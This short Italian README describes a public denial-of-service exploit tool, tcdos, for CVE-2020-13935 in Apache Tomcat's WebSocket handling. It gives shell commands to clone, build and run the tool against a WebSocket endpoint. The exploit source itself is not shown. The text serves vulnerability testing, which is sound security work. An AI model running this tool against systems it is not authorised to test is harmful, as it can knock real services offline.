
Exploit per vulnerabilità WebSocket in Apache Tomcat
Nel blog post corrispondente vengono spiegate in dettaglio l'analisi e lo sfruttamento della vulnerabilità.
Clona il repository, quindi compila il binario tcdos. Esegui il programma come segue per testare se un particolare endpoint WebSocket è vulnerabile:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]